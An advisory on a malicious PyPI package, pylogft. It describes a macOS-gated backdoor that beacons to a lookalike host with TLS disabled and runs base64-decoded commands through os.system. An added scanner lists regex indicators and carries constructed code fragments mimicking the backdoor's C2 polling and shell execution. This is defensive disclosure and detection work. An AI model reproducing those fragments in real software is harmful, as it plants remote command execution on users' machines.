OSV ID
MAL-2026-4253
Ecosystem
pypi
Summary
On import of pylogft, the package's __init__.py (lines 26-27) checks whether the install directory begins with /Users or /Library (macOS developer/CI hosts) and, if so, spawns _check.py as a detached subprocess with stdout and stderr redirected to DEVNULL. _check.py then POSTs the installer's resolved package directory (base_dir) to https://pypkg.dev/project/pylogft/json, a lookalike of pypi.org and pkg.go.dev, with TLS verification explicitly disabled via ssl._create_unverified_context(); this registers the host with the C2 and leaks the filesystem layout (e.g., /Users/<victim>/...). The script then polls that endpoint every 60s, base64-decodes the response, and passes the decoded string to os.system(f"pip show {package_list}"). The package's shell_escape regex permits the characters ;, |, &, and >, so any C2 response containing those metacharacters breaks out of the pip show prefix and executes arbitrary shell commands on the installer's machine. The package advertises itself as a pure-Python logger and has no legitimate reason to poll a remote endpoint, disable TLS, or execute returned payloads. The macOS-only gate, the silenced subprocess output, and the innocuous _check.py filename placed next to legitimate logger modules are evasion layered on top of the backdoor.
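The behaviours listed above (path gate, silenced subprocess, disabled TLS, lookalike host, base64-decoded response fed to os.system) can be turned into static review heuristics. The scanner below is an added example, not code from the advisory or from the package; the indicator names and regexes are my own assumptions, and the sample modules are constructed fragments that mimic the shapes described, not the real package source.

```python
import re
from typing import Dict, List

# Heuristics for the behaviours MAL-2026-4253 attributes to pylogft (names
# are mine; the regexes are assumptions, not the advisory's own signatures).
INDICATORS: Dict[str, str] = {
    "macos_path_gate": r"startswith\(\s*['\"]/(Users|Library)['\"]",
    "silenced_subprocess": r"subprocess\.Popen\([^)]*DEVNULL",
    "tls_verification_disabled": r"ssl\._create_unverified_context\(",
    "lookalike_registry_host": r"https?://pypkg\.dev/",
    "base64_decoded_response": r"b64decode\(",
    "shell_from_fstring": r"os\.system\(\s*f['\"]",
}

def scan_module(source: str) -> List[str]:
    """Return the indicator names that match one module's source text."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, source)]

def scan_package(modules: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each module path to its matched indicators, skipping clean files."""
    hits = {path: scan_module(src) for path, src in modules.items()}
    return {path: names for path, names in hits.items() if names}

def is_suspicious(modules: Dict[str, str], threshold: int = 3) -> bool:
    """Flag a package once distinct indicators across all modules reach threshold.
    A single hit (e.g. b64decode in a benign module) is too weak on its own."""
    distinct = {n for names in scan_package(modules).values() for n in names}
    return len(distinct) >= threshold

# Constructed sample modules mimicking the shapes described in the advisory;
# fetch() is a placeholder and the fragments are not runnable code.
SAMPLE_PACKAGE = {
    "pylogft/__init__.py": (
        'here = os.path.dirname(__file__)\n'
        'if here.startswith("/Users") or here.startswith("/Library"):\n'
        '    subprocess.Popen([sys.executable, "_check.py"],\n'
        '                     stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n'
    ),
    "pylogft/_check.py": (
        'ctx = ssl._create_unverified_context()\n'
        'resp = fetch("https://pypkg.dev/project/pylogft/json", ctx)\n'
        'package_list = base64.b64decode(resp).decode()\n'
        'os.system(f"pip show {package_list}")\n'
    ),
    # A legitimate logger module matches nothing.
    "pylogft/logger.py": 'class Logger:\n    def info(self, msg): print(msg)\n',
}
```

Running scan_package(SAMPLE_PACKAGE) reports two indicators on __init__.py and four on _check.py while logger.py is absent from the result, and is_suspicious(SAMPLE_PACKAGE) returns True.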
Source: amazon-inspector (9b35cabdffc8a44bcf857b973cc7eb89b6ae691c9be8189a58a0bd30c1a55a37)